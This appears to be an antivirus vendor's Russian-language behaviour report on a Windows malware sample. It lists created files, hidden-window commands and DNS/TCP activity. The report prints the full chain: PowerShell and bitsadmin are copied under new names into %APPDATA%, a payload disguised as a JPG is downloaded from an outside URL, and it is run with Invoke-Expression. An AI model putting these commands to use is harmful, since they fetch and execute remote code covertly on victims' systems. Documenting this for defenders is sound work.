Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '%APPDATA%\ogaj.exe' /transfer jxKhcs /download https://thesaurus.com/diziona/138382948392/1x1.jpg %APPDATA%\1x1.jpg
- '%APPDATA%\zogaj.exe' -c &{$dk=gc %APPDATA%\1x1.jpg| Out-String; Invoke-Expression $dk }
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\zogaj.exe
- %APPDATA%\ogaj.exe
Сетевая активность
TCP
- 'th###urus.com':443
UDP
- DNS ASK th###urus.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\zoGaJ.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\oGaJ.exe' (со скрытым окном)
- '%APPDATA%\ogaj.exe' /transfer jxKhcs /download https://thesaurus.com/diziona/138382948392/1x1.jpg %APPDATA%\1x1.jpg' (со скрытым окном)
- '%APPDATA%\zogaj.exe' -c &{$dk=gc %APPDATA%\1x1.jpg| Out-String; Invoke-Expression $dk }' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\zoGaJ.exe
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\oGaJ.exe
